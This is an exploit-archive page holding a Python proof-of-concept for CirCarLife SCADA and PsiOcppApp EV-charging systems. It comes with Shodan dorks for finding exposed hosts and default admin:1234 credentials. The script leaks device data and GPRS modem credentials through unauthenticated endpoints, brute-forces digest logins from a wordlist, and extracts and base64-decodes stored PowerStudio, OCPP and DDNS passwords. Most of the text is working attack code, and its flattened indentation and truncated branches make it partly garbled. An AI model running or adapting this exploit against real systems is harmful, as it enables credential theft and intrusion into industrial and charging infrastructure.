Circarlife scada 4.3.0 credential disclosure Vulnerability / Exploit

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Exploits / Vulnerability Discovered : 2018-09-12 | Type : webapps | Platform : hardware
This exploit / vulnerability Circarlife scada 4.3.0 credential disclosure is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: CirCarLife SCADA 4.3.0 - Credential Disclosure
# Date: 2018-09-10
# Exploit Author: David Castro
# Vendor Homepage:
# Shodan Dork: Server: CirCarLife Server: PsiOcppApp
# Version: CirCarLife Scada all versions under 4.3.0 OCPP implementation all versions under 1.5.0
# CVE : CVE-2018-12634

Description: Mutiple information disclosure issues, including admin credentials disclosure

import requests
from requests.auth import HTTPDigestAuth
from termcolor import colored
from bs4 import BeautifulSoup
import xml.etree.ElementTree as ET
import re
import json
import base64

cabecera = '''
_.-="_- _
_.-=" _- | ||"""""""---._______ __..
___.===""""-.______-,,,,,,,,,,,,`-''----" """"" """"" __'
__.--"" __ ,' CIR-PWN-LIFE o \ __ [__|
__-""=======.--"" ""--.=================================.--"" ""--.=======:
] [w] : / \ : |========================| : / \ : [w] :
V___________:| SadFud75 |: |========================| :| |: _-"
V__________: \ / :_|=======================/_____: \ / :__-"
-----------' "-____-" `-------------------------------' "-____-"


print colored(cabecera, 'white')
print colored('[*] POC for automated exploitation for CirControl SCADA systems (circarlife and OCPP (Open Charge Point Protocol))', 'blue')
print colored('[?] Vendor site:', 'yellow')
print colored('[*] CVEs associated: ', 'blue')
print colored('CVE-2018-12634, CVE-2018-16668, CVE-2018-16669, CVE-2018-16670, CVE-2018-16671, CVE-2018-16672', 'yellow')
print colored('[*] CirCarLife Scada versions affected: ', 'blue')
print colored('[+] All versions are vulnerable. No patch available, last version 4.3.0 (09/09/2018)', 'green')
print colored('[*] PsiOcppApp (PowerStudio integration Open Charge Point Protocol Application) versions affected: ', 'blue')
print colored('[+] All versions are vulnerable. No patch available, last version 1.5.0 (09/09/2018)', 'green')
print colored('[*] Shodan dorks: ', 'blue')
print colored('[+] Server: CirCarLife', 'green')
print colored('[+] Server: PsiOcppApp', 'green')
print colored('[?] More vulnerability POCs at', 'yellow')

plcs = []
logutil = ['GPRS modem details']
autenticado = False

arr_versionessoft = []
arr_ldevstat = []
str_repository = ''
str_lversioneshard = ''
arr_logdetails = []
str_lsetup = ''
str_lconfig = ''

def lversionessoft():
print colored('[*] Getting software versions via CVE-2018-16671', 'blue')
leakv = requests.get(target1 + '/html/device-id')
versiones = leakv.text.encode("utf8").split('\n')
print colored('[+] Software versions collected succesfully', 'green')
return versiones

def ldevstat():
print colored('[*] Getting plc status via CVE-2018-16670', 'blue')
leakstats = requests.get(target1 + '/services/user/values.xml?var=STATUS')
statsraw = leakstats.text
tree = ET.fromstring(statsraw)
for i in range(0,len(tree.findall(".//variable"))):
for j in range(0,2):
print colored('[+] information leaked from ' + str(len(plcs)/2) + ' plcs', 'green')
return plcs

def plcstatus(code):
code = int(code)
if code == 1:
print colored('[+] OK', 'green')
elif code == 2:
if code == 0x10:
if code == 0x20:
print colored('[-] Error: Time out.', 'red')
elif code == 0x40:
print colored('[-] Error: Bad device.', 'red')
elif code == 0x80:
print colored('[-] Error: Bad phase.', 'red')
elif code == 0x100:
print colored('[-] Error: Bad version.', 'red')
print colored('[-] Error: Unknown error.', 'red')
elif code == 4:
print colored('[-] Error: not initialized.', 'red')
print colored('[?] Unknown code.', 'yellow')

def repository():
print colored('[*] Getting installation paths via CVE-2018-16668', 'blue')
path = requests.get(target1 + '/html/repository')
rutas = path.text.encode("utf8").split('\n')
platformpath = rutas[1].split(' ')
platformpath = platformpath[0]
appsrc = rutas[3]
appsrc = rutas[3].split(' ')
appsrc = appsrc[0]
raiz = str(appsrc).find('/circarlife/')
appsrc = appsrc[0:raiz+len('/circarlife/')]
print colored('[+] Platform installation path retrieved succesfully', 'green')
return 'Platform installation path: ' + platformpath + '\n[+] Applicaction installation path: ' + appsrc

def lversioneshard():
print colored('[*] Getting powerstudio driver versions via CVE-2018-12634', 'blue')
basura = ['/li', '<', 'body', 'html', '>', '/ul', '/']
hardleak = requests.get(target1 + '/services/system/info.html')
hardleak = hardleak.text.encode("utf8").replace('<br />', '\n')
hardleak = hardleak.replace('<li>', '\n')
for caca in basura:
hardleak = hardleak.replace(caca, '')
print colored('[+] Powerstudio driver versions leaked succesfully', 'green')
return hardleak

def logdetails():
print colored('[*] Leaking sensitive information via CVE-2018-12634', 'blue')
log = requests.get(target1 + '/html/log')
log = log.text.encode("utf8")
print colored('[*] Searching for modem id', 'blue')
posmid = log.rfind('/modem-start: modem id: ')
logarr = log.split('\n')
if posmid != -1:
logutil.append('Modem model:')
print colored('[*] Modem id located', 'blue')
for linea in logarr:
if '/modem-start: modem id: ' in linea:
print colored('[+] Modem id leaked', 'green')
linea = linea.split(' ')
print colored('[-] Modem id not found', 'red')
print colored('[*] Searching for GPRS modem credentials', 'blue')
poslogin = log.rfind('Greetings!!')
if poslogin != -1:
print colored('[*] Credentials found', 'blue')
logutil.append('Modem credentials')
print colored('[+] GPRS modem credentials retrieved', 'green')
for linea in logarr:
if 'password=\"' in linea:
linea = linea.split(' ')
print colored('[-] GPRS modem credentials not found with CVE-2018-12634', 'red')
return logutil

def lsetup(user, pwd):
print colored('[*] Exploiting CVE-2018-16672 to leak information', 'blue')
r1 = requests.get(target1 + '/services/system/setup.json', auth=HTTPDigestAuth(user, pwd))
if r1.text.encode("utf8").find('not granted') != -1:
print colored('[-] Error, login failed', 'red')
respuesta = r1.text.encode("utf8")
print colored('[+] Setup information leaked')
return respuesta

def lbrute():
global luser80
global lpasswd80
global luser8080
global lpasswd8080
dicc = raw_input('Enter dictionary file with extension[format[user:password]]: ')
listado = open(dicc, "r")
data = listado.readlines()
print colored('[*] Starting bruteforce...', 'blue')
for linea in data:
linea = linea.split(':')
user = linea[0]
pwd = linea[1]
r1 = requests.get(target1 + '/services/system/setup.json', auth=HTTPDigestAuth(user.strip(), pwd.strip()))
r2 = requests.get(target2 + '/services/config/config.xml', auth=HTTPDigestAuth(user.strip(), pwd.strip()))
if r1.text.encode("utf8").find('not granted') != -1:
print colored('[-] Error, login failed on port 80 with ' + user + ':' + pwd, 'red')
print colored('[+] Valid credentials found on port 80: ' + user + ':' + pwd, 'green')
luser80 = user
lpasswd80 = pwd
if r2.text.encode("utf8").find('Acess not granted') != -1:
print colored('[-] Error, login failed on port 8080 with ' + user + ':' + pwd, 'red')
print colored('[+] Valid credentials found on port 8080: ' + user + ':' + pwd, 'green')
luser8080 = user
lpasswd8080 = pwd

def lconfig(user, pwd):
print colored('[*] Leaking config file via CVE-2018-16669', 'blue')
r2 = requests.get(target2 + '/services/config/config.xml', auth=HTTPDigestAuth(user.strip(), pwd.strip()))
if r2.text.encode("utf8").find('Acess not granted') != -1:
print colored('[-] Error. Login failed', 'red')
config = r2.text.encode('utf8')
print colored('[+] Config file leaked succesfully', 'green')
return config

def salida(versiones, plcs, ruta, hard, log, setup, config):
print colored('[*] Parsing information and generating output.', 'blue')
print colored('[*] Parsing software information', 'blue')
print colored('[+] Device name: ', 'green') + versiones[0]
print colored('[+] Software_name: ', 'green') + versiones[1]
print colored('[+] Software_version: ', 'green') + versiones[2]
print colored('[+] System time: ', 'green') + versiones[3]
print colored('[+] ', 'green') + ruta
print colored('[*] Parsing powerstudio driver versions', 'blue')
hard = hard.replace('ul', '')
print colored(hard.strip(), 'green')
print colored('[*] Parsing PLCs values', 'blue')
for i in range(0,len(plcs)):
if ((i % 2) != 0):
codigo = plcs[i].split('.')
nombre = plcs[i].replace('.STATUS', '')
print colored('[+] PLC name: ' + nombre, 'green')
print colored('[*] Parsing leaked data from logs using CVE-2018-12634', 'blue')
if len(log) > 3:
print colored('[*] ' + log[0], 'blue')
for i in range(2,len(log)):
if log[i] != 'Modem credentials':
print colored('[+] GPRS router model found: ', 'green') + log[i]
for i in range(0,len(log)):
if log[i] == 'Modem credentials':
creds = i

for i in range(creds + 1, len(log)):
if (log[i].rfind('user=')) != -1:
usuario = log[i].split('=')
user = usuario[1]
user = user.replace('\"', '')
if (log[i].rfind('password=')) != -1:
cont = log[i].split('=')
contrase = cont[1]
contrase = contrase.replace('\"', '')
contrase = contrase.replace(']', '')
print colored('[+] Username and password for GPRS modem found: ', 'green') + user + ':' + contrase
colored('[?] No data was extracted from logs using CVE-2018-12634', 'yellow')
print colored('[*] Parsing setup file', 'blue')
if (len(str(setup)) > 5):
datos = json.loads(setup)
print colored('[*] Processing device configuration data: ', 'blue')
print colored('[+] MAC Address: ', 'green') + datos["device"]["mac"]
print colored('[+] IMEI: ', 'green') + datos["device"]["imei"]
print colored('[+] ICCID: ', 'green') + datos["device"]["iccid"]
print colored('[+] IMSI: ', 'green') + datos["device"]["imsi"]
print colored('[*] Processing network configuration data: ', 'blue')
print colored('[+] Hostname: ', 'green') + datos["network"]["hostname"]
print colored('[+] ClientId: ', 'green') + datos["network"]["clientid"]
print colored('[+] IP address: ', 'green') + datos["network"]["ip"]
print colored('[+] Netmask: ', 'green') + datos["network"]["netmask"]
print colored('[+] Gateway: ', 'green') + datos["network"]["gateway"]
print colored('[+] Name server 0: ', 'green') + datos["network"]["nameserver0"]
print colored('[+] Name server 1: ', 'green') + datos["network"]["nameserver1"]
print colored('[*] Processing locale options configuration data', 'blue')
print colored('[+] Language: ', 'green') + datos["locale"]["language"]
print colored('[+] Currency: ', 'green') + datos["locale"]["currency"]
print colored('[*] Processing public address configuration data', 'blue')
print colored('[+] Host type: ', 'green') + datos["paddress"]["hosttype"]
print colored('[+] Host: ', 'green') + datos["paddress"]["host"]
print colored('[*] Processing time configuration data', 'blue')
print colored('[+] NTP Server 0: ', 'green') + datos["time"]["ntpserver0"]
print colored('[+] NTP server 1: ', 'green') + datos["time"]["ntpserver1"]
print colored('[+] Timezone: ', 'green') + datos["time"]["timezone"]
print colored('[*] Processing GPRS modem configuration data', 'blue')
print colored('[+] Acess point name: ', 'green') + datos["modem"]["apn"]
print colored('[+] Username: ', 'green') + datos["modem"]["usr"]
print colored('[+] Password: ', 'green') + datos["modem"]["pwd"]
print colored('[+] Reset: ', 'green') + str(datos["modem"]["reset"])
print colored('[+] Ping Ip: ', 'green') + str(datos["modem"]["pingip"])
print colored('[+] Ping period: ', 'green') + str(datos["modem"]["pingperiod"])
print colored('[+] Ping auto reset: ', 'green') + str(datos["modem"]["pingautoreset"])
print colored('[*] Processing DDNS configuration data', 'blue')
print colored('[+] DDNS server: ', 'green') + datos["ddns"]["server"]
print colored('[+] DDNS host: ', 'green') + datos["ddns"]["host"]
print colored('[+] DDNS Username: ', 'green') + datos["ddns"]["usr"]
print colored('[+] DDNS password: ', 'green') + datos["ddns"]["pwd"]
print colored('[*] Processing security configuration data', 'blue')
print colored('[+] Username: ', 'green') + datos["security"]["user"]
print colored('[+] Password: ', 'green') + str(datos["security"]["passwd"])
print colored('[*] Processing services configuration data', 'blue')
print colored('[+] iManager', 'green') + str(datos["services"]["imanager"])
print colored('[+] Active-Integration: ', 'green') + str(datos["services"]["activeIntegration"])
print colored('[+] Web Editor: ', 'green') + str(datos["services"]["webeditor"])
print colored('[+] SCADA Applet: ', 'green') + str(datos["services"]["appletscada"])
print colored('[+] Html5: ', 'green') + str(datos["services"]["html5"])
print colored('[*] Parsing Open Charge Point Protocol configuration file', 'blue')
print colored('[-] Unable to retrieve the setup config file', 'red')
if (len(str(config)) > 10):
tree = ET.fromstring(config)
print colored('[*] Processing management system CS settings', 'blue')
print colored('[+] End point: ', 'green') + str(tree.find('.//csEndPoint').text)
print colored('[+] Username: ', 'green') + str(tree.find('.//csUser').text)
print colored('[+] Password: ', 'green') + str(tree.find('.//csPassword').text)
print colored('[+] Litle endian: ', 'green') + str(tree.find('.//isLitleEndian').text)
print colored('[*] Processing Charge Box settings file', 'blue')
print colored('[+] Charge box Protocol: ', 'green') + str(tree.find('.//cbProtocol').text)
print colored('[+] Charge box certificate: ', 'green') + str(tree.find('.//cbRequireCsClientCertificate').text)
print colored('[+] Charge box ID: ', 'green') + str(tree.find('.//cbId').text)
print colored('[+] Charge box Username: ', 'green') + str(tree.find('.//cbUser').text)
print colored('[+] Charge box password: ', 'green') + str(tree.find('.//cbPassword').text)
print colored('[+] Charge box OCPP internal port: ', 'green') + str(tree.find('.//cbOcppPortInternal').text)
print colored('[+] Charge box OCPP public port: ', 'green') + str(tree.find('.//cbOcppPortPublic').text)
print colored('[+] Charge box use whitelist: ', 'green') + str(tree.find('.//cbUseWl').text)
print colored('[+] Charge box whitelist first: ', 'green') + str(tree.find('.//cbWlFirst').text)
print colored('[+] Charge box offline authentication: ', 'green') + str(tree.find('.//cbAuthOffline').text)
print colored('[+] Charge box internal error retry delay: ', 'green') + str(tree.find('.//cbRetryInternalErr').text)
print colored('[+] Charge box use OCPP T-Sync: ', 'green') + str(tree.find('.//cbUseOcppTSync').text)
print colored('[+] Charge box use compression: ', 'green') + str(tree.find('.//cbUseCompression').text)
print colored('[+] Charge box use aprtial energy: ', 'green') + str(tree.find('.//cbUsePartialEnergy').text)
#print colored('[+] Charge box use partial energy meter value: ', 'green') + str(tree.find('.//cbUsePartialEnergyMeterVal').text)
print colored('[+] Charge box stop if unauthenticated: ', 'green') + str(tree.find('.//cbStopIfUnauth').text)
print colored('[+] Charge box stop if concurrent tx: ', 'green') + str(tree.find('.//cbStopIfConcurrentTx').text)
print colored('[+] Charge box hearth-beat interval: ', 'green') + str(tree.find('.//cbHbInterval').text)
print colored('[+] Charge box connection time out interval: ', 'green') + str(tree.find('.//cbConnTimeOut').text)
print colored('[+] Charge box meter interval: ', 'green') + str(tree.find('.//cbMeterInterval').text)
#print colored('[+] Charge box public Ip timeout interval: ', 'green') + str(tree.find('.//cbPublicIpTimeOut').text)
#print colored('[+] Charge box authentication required for remote start: ', 'green') + str(tree.find('.//cbRequireAuthRemoteStart').text)
#print colored('[+] Charge box meter requires power: ', 'green') + str(tree.find('.//cbMeterValRequiresPower').text)
print colored('[*] Processing Powerstudio engine settings file' , 'blue')
print colored('[+] Powerstudio engine host: ', 'green') + str(tree.find('.//pwStdHost').text)
print colored('[+] Powerstudio engine port: ', 'green') + str(tree.find('.//pwStdPort').text)
print colored('[+] Powerstudio engine username: ', 'green') + str(tree.find('.//pwStdUser').text)
print colored('[+] Powerstudio engine password: ', 'green') + base64.b64decode(str(tree.find('.//pwStdPassword').text))
print colored('[+] Powerstudio engine username (with edit permissions): ', 'green') + str(tree.find('.//pwStdUserEdit').text)
print colored('[+] Powerstudio engine password (with edit permissions): ', 'green') + base64.b64decode(str(tree.find('.//pwStdPasswordEdit').text))
print colored('[*] Processing powerstudio application parameters', 'blue')
print colored('[+] Powerstudio application port: ', 'green') + str(tree.find('.//pssPort').text)
print colored('[+] Powerstudio application admin: ', 'green') + str(tree.find('.//pssAdminUser').text)
print colored('[+] Powerstudio application password: ', 'green') + base64.b64decode(str(tree.find('.//pssAdminPassword').text))
print colored('[+] Powerstudio application debug logging level: ', 'green') + str(tree.find('.//pssLoglevel').text)
print colored('[-] Unable to retrieve the OCPP config file', 'red')

url = raw_input('Insert target ip: ')
target1 = 'http://' + url
target2 = 'http://' + url + ':8080'
luser80 = 'admin'
lpasswd80 = '1234'
luser8080 = 'admin'
lpasswd8080 = '1234'
luser80 = raw_input('Insert username for login at circarlife server: (b to bruteforce)')
if (luser80 == 'b'):
lpasswd80 = raw_input('Insert password for login at circarlife server: ')
luser8080 = raw_input('Insert username for login at OCPP server: ')
lpasswd8080 = raw_input('Insert password for login at OCPP server: ')

versiones = lversionessoft()
plcs = ldevstat()
ruta = repository()
hard = lversioneshard()
log = logdetails()
setup = lsetup(luser80.strip(), lpasswd80.strip())
config = lconfig(luser8080.strip(), lpasswd8080.strip())
salida(versiones, plcs, ruta, hard, log, setup, config)